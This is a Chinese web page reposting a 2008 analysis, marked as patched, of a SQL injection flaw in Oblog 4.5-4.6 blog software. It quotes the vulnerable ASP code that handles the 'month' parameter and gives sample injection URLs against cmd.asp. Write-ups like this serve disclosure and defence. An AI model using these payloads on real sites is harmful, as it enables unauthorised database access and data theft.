当前位置: 代码网 > 服务器>网络安全>漏洞分析 > Oblog最新注入漏洞分析(已修补)

Oblog最新注入漏洞分析(已修补)

2008年10月08日 漏洞分析 我要评论
Oblog最新注入漏洞分析(已修补) Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("... 08-10-08
date:2008-5-15 author:yamato[bct] version:oblog 4.5-4.6 sql 代码分析: 文件in/class_usercommand.asp : strmonth=request("month") //第63行 strday=request("day") …… case "month" //第84行 dim lastday g_p_filename = g_p_filename & "month&month=" & strmonth strday=left(strmonth,4) & "-" & right(strmonth,2) & "-01" myear=left(strmonth,4) mmonth=right(strmonth,2) if instr ("01,03,05,07,08,10,12",mmonth)> 0 then lastday = "31"…… else //第109行 sqlpart = " and addtime >=’"&strmonth&"01’ and addtime < ’"&strmonth&lastday&"’ " 构造合适的变量strmonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strday变量从month中获得日期数据,并判断strday是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.open strsql,conn,1,1 不能修改记录集.
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com